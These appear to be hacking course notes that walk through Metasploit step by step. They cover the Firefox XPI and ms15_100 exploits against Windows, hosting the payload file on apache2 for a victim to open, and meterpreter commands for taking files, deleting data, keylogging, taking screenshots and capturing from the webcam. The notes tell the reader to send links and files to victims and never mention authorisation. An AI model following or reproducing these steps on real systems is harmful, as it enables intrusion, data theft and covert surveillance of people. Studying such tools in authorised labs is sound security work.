System Hacking:
Practical No 1: Basics
Open a blank terminal and type
service postgresql start
Wait a few minutes, and then type
msfconsole
The above command loads the Metasploit Framework console, where we can use a number of
Metasploit Framework modules through a command-line interface.
Msfconsole basics:
show exploits
show payloads
show auxiliary
show post
show encoders
show nops
show options
You can use the show command with any of the options listed above to see the available modules
and the options for the module you have already selected.
You can use
search <keyword>
to search the available modules in your Metasploit for a particular keyword.
Ex: search ftp
You can use the
exit command to leave the Metasploit framework.
If you have some active sessions you have to type
exit -y
Chinni Diwakar 1
Practical No 2: Hacking PC with Firefox
Hacking Windows with a Firefox exploit using msfconsole:
Open a blank terminal and type
service postgresql start
msfconsole
Once you get the msf> prompt, search for firefox_xpi
search firefox_xpi
You will get a list of exploits like the one above. Copy the exploit name and run the info command
on it to get information about the exploit.
Once you have read the information, you can select the exploit with the use command.
use <exploitname>
You can type show targets to see the available targets
For a specific target, please set your target as Native Payload.
You can configure a payload with the set PAYLOAD command
set PAYLOAD <payload name>
You can execute the show options command to see the options required to run the exploit successfully.
show options
Configure the important options such as SRVHOST, SRVPORT, URIPATH and LHOST.
Once you have configured everything, execute show options again to confirm the settings.
Then type exploit to start the malicious server.
Now any victim who clicks on your malicious link will be shown a page like the one in the picture below.
To list the hacked victims, execute the command
sessions
in the attack area.
To access a specific session, execute the command
sessions -i <ID Number of session>
You will now get a meterpreter prompt in the msfconsole window, which confirms that you are inside the
victim machine. You can enter ‘?’ at the meterpreter prompt to see the list of possible commands.
For example, I am executing the sysinfo command to get the system details, as shown in the image below.
More meterpreter commands are explained later in this document.
Practical No 3: Hacking a Windows machine with the ms15_100 exploit
Step 1: load Metasploit framework with
service postgresql start
msfconsole
Step 2: search for exploit code
search ms15_100
Step 3: configuring exploit
use <exploit name>
Step 4: configuring payload
set PAYLOAD <payload name>
Step 5: configuring options
show options
set SRVHOST <attacker IP>
set LHOST <attacker IP>
set LPORT <attacker port>
set FILENAME <filename.mcl>
exploit
This will create a .mcl file at /root/.msf5/local/filename.mcl
Please share this file with your victim.
For this purpose you can use the apache2 server in your Kali Linux.
Step 6:
Syntax: cp sourcefile apache2location
Ex: cp /root/.msf5/local/filename.mcl /var/www/html
service apache2 start
Now wait for the connection.
Because we selected meterpreter as the payload, you will get meterpreter access to the target computer.
Practical No 4: Meterpreter Commands
sysinfo command
To know about the system
ifconfig command
To know the victim IP
pwd command
To know the current working directory
cd command
To change the directory
ls is used to see the available files in the current directory
cat command is used to read the contents of a text file
This command will show output like the image below
download command is used to download any file from the victim PC to the attacker PC
rm is used to delete any file
Like this
upload command is used to upload any file from the attacker machine to the victim machine
You need to give the complete file path to successfully transfer that file.
background command is used to come out of a valid session without losing it.
Again you can use sessions -i <ID no>
to get the session back.
You can use keyscan_start to start a passive keylogger on the target machine
keyscan_dump to get the keylogger logs
keyscan_stop to stop the keylogger
ps is to know the available Processes and their Process IDs (PIDs)
migrate is to jump from one PID to another PID
getuid is used to get the user ID on the target machine
getpid is used to get the running process id of the active session
execute is used to execute any executable like an .exe or .msi on the target machine
screenshot command is used to get an active screenshot of the target machine. You can follow the file
path to see the screenshot.
You can see a live stream from the victim webcam with the webcam_stream option
You can also take pictures from the victim webcam with the webcam_snap option